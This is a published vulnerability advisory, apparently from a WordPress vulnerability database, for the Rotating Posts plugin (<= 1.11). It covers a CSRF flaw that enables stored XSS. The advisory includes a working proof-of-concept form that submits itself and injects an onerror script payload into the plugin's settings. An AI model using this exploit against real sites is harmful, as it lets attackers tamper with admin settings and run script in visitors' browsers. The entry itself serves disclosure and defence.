WordPress Plugin Vulnerabilities
Rotating Posts <= 1.11 - Arbitrary Settings Update to Stored XSS via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Proof of Concept
<form id="test" action="https://example.com/wp-admin/options-general.php?page=rp-admin.php" method="POST">
<input type="text" name="rp_submit_hidden" value="submit">
<input type="text" name="rp_number_posts" value="5">
<input type="text" name="rp_timer_sec" value="5">
<input type="text" name="rp_read_more" value='"><img src=x onerror=alert(/XSS/)>'>
<input type="text" name="rp_title" value="true">
<input type="text" name="rp_date_time" value="true">
<input type="text" name="rp_date_time_str" value="F jS, Y">
<input type="text" name="rp_author" value="true">
<input type="text" name="rp_author_prefix" value="by">
<input type="text" name="rp_categories" value="true">
<input type="text" name="rp_comments" value="true">
<input type="text" name="rp_use_this_category" value="0">
<input type="text" name="rp_left" value="https://example.com/wp-content/plugins/rotating-posts/images/left.jpg">
<input type="text" name="rp_right" value="https://example.com/wp-content/plugins/rotating-posts/images/right.jpg">
<input type="text" name="rp_pause_normal" value="https://example.com/wp-content/plugins/rotating-posts/images/pause.jpg">
<input type="text" name="rp_pause_pressed" value="https://example.com/wp-content/plugins/rotating-posts/images/pause_on.jpg">
</form>
<script>
document.getElementById("test").submit();
</script> Affects Plugins
No known fix - plugin closed
References
Classification
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-05-31 (about 1 years ago)
Added
2022-05-31 (about 1 years ago)
Last Updated
2023-03-01 (about 6 months ago)